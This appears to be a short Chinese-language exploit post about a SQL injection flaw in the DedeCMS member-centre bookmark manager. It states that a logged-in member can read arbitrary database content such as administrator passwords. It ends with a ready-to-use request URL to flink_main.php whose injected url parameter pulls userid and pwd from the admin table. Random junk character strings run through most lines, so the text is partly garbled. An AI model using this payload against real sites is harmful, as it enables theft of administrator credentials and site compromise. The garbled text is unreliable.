DedeCMS会员中心SQL注射漏洞
5 X- C0 o# d5 \- c2 e) q7 O需要magic_quotes_gpc = Off
1 l# P3 v7 p# F! Z0 M) b会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.5 C) U3 @% n, X
9 t- a0 |/ ]0 f* G# w- ~' FDedeCMS会员中心书签管理SQL注射漏洞
7 r7 L2 ~( q' V9 Q( u4 e成功利用该漏洞可获得管理员密码
: [' W$ _) ~! ^
8 ` C3 I. o) |' P m/ ^会员登录后可以执行SQL语句查询数据库任意内容如管理员密码) @+ e' Y. Z, [8 e
; u- X& a( p. \! J/ a l9 J4 a- v: n
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r8 W. B9 G- w" _! ~# K
|